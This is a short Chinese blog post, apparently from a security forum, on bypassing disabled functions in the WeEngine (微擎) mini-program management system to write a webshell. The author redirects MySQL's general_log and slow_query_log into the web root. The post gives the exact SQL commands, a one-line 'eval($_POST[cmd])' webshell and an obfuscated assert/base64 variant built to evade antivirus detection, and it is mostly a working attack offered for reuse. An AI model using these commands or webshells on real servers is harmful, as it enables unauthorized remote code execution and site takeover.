微擎绕过禁用函数写一句话

好大一条虫 347 次浏览 0

在做项目的时候碰到的问题 本地搭建 然后测试了下

微擎是一款小程序和公众号管理系统,可以实现微信平台(mp.weixin.qq.com)不能实现的功能,例如商城,餐饮,酒店,汽车,门店,同城,各类行业解决方案,营销,推广,吸粉,游戏,物联网和人工智能等功能。

搭建的环境

1.最新的微擎源码
2.windwos+php5.5+apache
3.安全狗
4.root权限(必须)

详细过程

1.站点设置里面打开调试
微擎绕过禁用函数写一句话

2.执行语句
select into被禁止
微擎绕过禁用函数写一句话

3.利用日志文件写shell

show variables like '%general%';  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址

select '<?php eval($_POST[cmd]);?>'  #写入shell

微擎绕过禁用函数写一句话

4.SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

##补充:来自土司@GuoKerSb的分享
在无法修改general_log_file指向的地址且网站用户量多时刻处于查询的状态,我们还可以通过启动slow_query_log(慢查询日志,默认关闭)来写shell

set global slow_query_log=1;
set global slow_query_log_file='/var/www/html/1.php';
select '<?php eval($_POST[cmd]);?>' or sleep(11);

PS:思路也是在网上看到的 同样phpmyadmin也可以尝试 (记录总结)

发表评论 取消回复
表情 图片 链接 代码